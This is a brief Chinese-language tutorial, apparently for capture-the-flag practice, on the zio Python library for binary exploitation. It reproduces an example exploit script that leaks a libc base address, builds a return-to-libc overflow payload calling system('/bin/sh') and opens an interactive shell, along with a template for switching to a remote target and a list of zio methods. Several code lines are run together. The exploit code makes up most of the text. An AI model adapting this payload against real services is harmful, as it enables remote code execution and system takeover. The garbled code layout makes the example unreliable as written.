zio库没有提供文档
这个是官方给出的一个例子程序
from zio import *
io = zio('./buggy-server')
# io = zio((pwn.server, 1337)) for i in xrange(1337):
io.writeline('add ' + str(i))
io.read_until('>>') io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
io.read_until('A' * 49)
libc_base = l32(io.read(4)) - 0x1a9960
libc_system = libc_base + 0x3ea70
libc_binsh = libc_base + 0x15fcbf
payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
io.write('info ' + payload + "\nshow\nexit\n")
io.read_until(">>")
# We've got a shell;-)
io.interact()
可以做本地和远程的切换
from zio import * if you_are_debugging_local_server_binary:
io = zio('./buggy-server') # used for local pwning development
elif you_are_pwning_remote_server:
io = zio(('1.2.3.4', 1337)) # used to exploit remote service io.write(your_awesome_ropchain_or_shellcode)
# hey, we got an interactive shell!
io.interact()
总结一下
zio (('127.0.0.1',3389), timeout = 9999)
连接到ip的端口
zio('./pwn1') 加载本地文件
writeline('abc') 发送字符串
write(‘abc') 发送字符串
read_until('hello') 直到收到字符串
read(4) 接收
l32() 4byte
l64() 8byte
interact()与shell交互